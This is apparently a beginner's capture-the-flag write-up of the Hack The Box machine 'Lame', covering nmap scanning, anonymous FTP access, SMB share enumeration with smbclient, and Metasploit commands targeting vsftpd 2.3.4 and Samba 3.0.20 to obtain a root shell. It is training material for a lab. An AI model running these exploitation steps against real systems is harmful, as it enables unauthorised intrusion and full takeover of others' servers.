Lame writeup HTB

Lame

Easy box exploiting known exploits as well as introducing important protocols such as FTP and SMB.

Discovery

Using the tool nmap, we are able to scan the network for open ports to provide us vectors of attack. Using the command :

nmap -sV -sC -T4 <IP>

We are able to see a few open ports we can try to attack :

File Transfer Protocol

FTP is an old internet protocol for communication amongst computers in a network. Files and information are sent from a server to a client. Since the FTP port (21) is open, let’s see if it allows anonymous access (meaning everyone can access the files) :

[ftp <IP>] followed by typing Anonymous as the username and leaving the password empty

It does! However, it turns there are no files present for us to view. Let’s move on to some of the other open ports, like 139 or 455. 

 

Server Message Block

SMB, like FTP, is a communication protocol. SMB allows computers to modify files on the server, which is accessed remotely. These files can be stored in folders, called shares. Again, let’s see if we can connect to the server to potentially uncover some sensitive information. First, let’s uncover and enumerate some of the shares available for us to potentially access.

smbclient -L <IP> -N

Where <-L> tells the tool to list the available shares and <-N> suppresses the password prompt.

Two shares peak my interest. The one called tmp and the one called optNow let’s try to connect to a share, still using the smbclient client tool :

smbclient \\\\<IP>\\tmp   or   smbclient \\\\<IP>\\opt

We have access to both of these! But just like the ftp server, it doesn’t look like there are any juicy files for us. No worries. Let’s go back to the nmap scan we performed earlier.

Shell as root

Returning to the nmap scan, it’s important to notice the version of the services offered because a known exploit for them could already be found.

Sure enough, a quick google search on both of them reveals serious exploits for these versions have already been discovered.

https://www.exploit-db.com/exploits/49757 –> for the ftp server

https://www.exploit-db.com/exploits/16320 –> for the smb server

Great! All the work as already been done for us. All we need to do now is run one of the exploits and provide them with all the information they need to complete the exploit. Alternatively, we could also use Metasploit, a penetration testing tool backed by a huge database of known exploits, to do the work for us. Let’s use the smb exploit as an example.

msfconsole –> starting metasploit

search vsftpd 2.3.4   or  search samba 3.0.20 –> search the database for exploit needed, then select with use <exploitnumber>

show options –> to show the options we need to fill in order to complete the exploit.

set rhosts <IP> so the script knows what server to attack

set lhost <YOURIP> (type ifconfig tun0 to find it)

exploit   or   run –> runs the exploit!

Running the exploit gives us a shell! But not just any type of shell. A root shell! This means we are now connected to the server with full privileges, so we can do pretty much whatever we want. Since this is a CTF challenge, I’ll go look for both flags. The user flag is in one of the user home directories while the other one resides in the /root directory.